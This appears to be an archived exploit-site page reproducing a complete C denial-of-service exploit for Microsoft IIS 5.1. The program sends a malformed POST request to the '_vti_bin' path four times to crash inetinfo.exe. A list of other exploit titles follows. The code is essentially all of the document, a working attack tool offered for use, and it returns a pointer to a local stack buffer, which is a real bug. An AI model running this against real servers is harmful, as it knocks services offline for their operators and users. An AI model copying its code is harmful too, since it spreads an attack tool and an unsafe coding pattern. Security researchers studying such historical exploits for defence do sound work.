exploits , vulnerabilities , articles , Microsoft IIS Malformed HTTP Request Handling Remote Denial of Service Exploit

2005-12-19

Microsoft IIS Malformed HTTP Request Handling Remote Denial of Service Exploit

/*****************************************************************

Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan

Application: Microsoft IIS (Internet Information Server)
Vendor: Microsoft - http://www.microsoft.com/

Discovered by: Inge Henriksen
Exploit Coded by: Kozan
Credits to ATmaCA, Inge Henriksen
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

Vulnerable: 
Microsoft Internet Information Server® V5.1

Not vulnerable: 
Microsoft Internet Information Server® V5.0 
Microsoft Internet Information Server® V6.0

Only folders with Execute Permissions set to 'Scripts & Executables' 
are affected, such as the '_vti_bin' directory.

inetinfo.exe will be crashed after exploitation finished successfuly.

Usage: iis51dos.exe [Target Url or IP]

*****************************************************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")


char *HttpHeader(char *pszHost)
{
char szHeader[1000];

wsprintf( szHeader, "POST /_vti_bin/.dll/*/~0 HTTP/1.1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Host: %s\r\n"
"Content-Length: 0\r\n\r\n"
, pszHost
);

return szHeader; 
}


int main(int argc, char *argv[])
{
fprintf(stdout, "\n\nMicrosoft IIS 5.1 Remote D.o.S Exploit by
Kozan\n"
"Bug Discovered by: Inge Henriksen\n"
"Exploit Coded by: Kozan\n"
"Credits to ATmaCA, Inge Henriksen\n"
"www.spyinstructors.com - kozan@spyinstructors.com\n\n"
);

if( argc != 2 )
{
fprintf(stderr, "\n\nUsage:\t%s [WebSiteUrl]\n\n", argv[0]);
return -1;
}

WSADATA wsaData;
struct hostent *pTarget;
struct sockaddr_in addr;
SOCKET sock;

char szHeader[1000], szWebUrl[1000];

lstrcpy(szWebUrl, argv[1]);
lstrcpy(szHeader, HttpHeader(szWebUrl));

if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!\n");
return -1;
}

sock = socket(AF_INET,SOCK_STREAM,0);

if( sock == -1 )
{
fprintf(stderr, "Socket error!\n");
return -1;
}

if( (pTarget = gethostbyname(szWebUrl)) == NULL ) 
{
fprintf(stderr, "Address resolve error!\n");
return -1;
}

memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
memset(&(addr.sin_zero), '\0', 8);

fprintf(stdout, "Please wait while connecting...\n");

if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) ==
-1 )
{
fprintf(stderr, "Connection failed!\n");
closesocket(sock);
return -1;
}

fprintf(stdout, "Connected.\n\n");

fprintf(stdout, "Please wait while sending DoS request
headers...\n\n");

for( int i=0; i<4; i++ )
{
fprintf(stdout, "Sending %d. request...\n", i+1);

if( send(sock, szHeader, lstrlen(szHeader),0) == -1 )
{
fprintf(stderr, "%d. DoS request header could not sent!\n",
i+1);
closesocket(sock);
return -1;
}

fprintf(stdout, "%d. request sent.\n\n", i+1);
}

fprintf(stdout, "Operation completed...\n");
closesocket(sock);
WSACleanup();


return 0;
}
securitydot.net - 2005-12-19

Exploits - newest 10 RSS | More

2007-06-15 55583 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 32944 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41014 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28547 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19105 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16147 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18769 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16042 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 32716 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16671 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit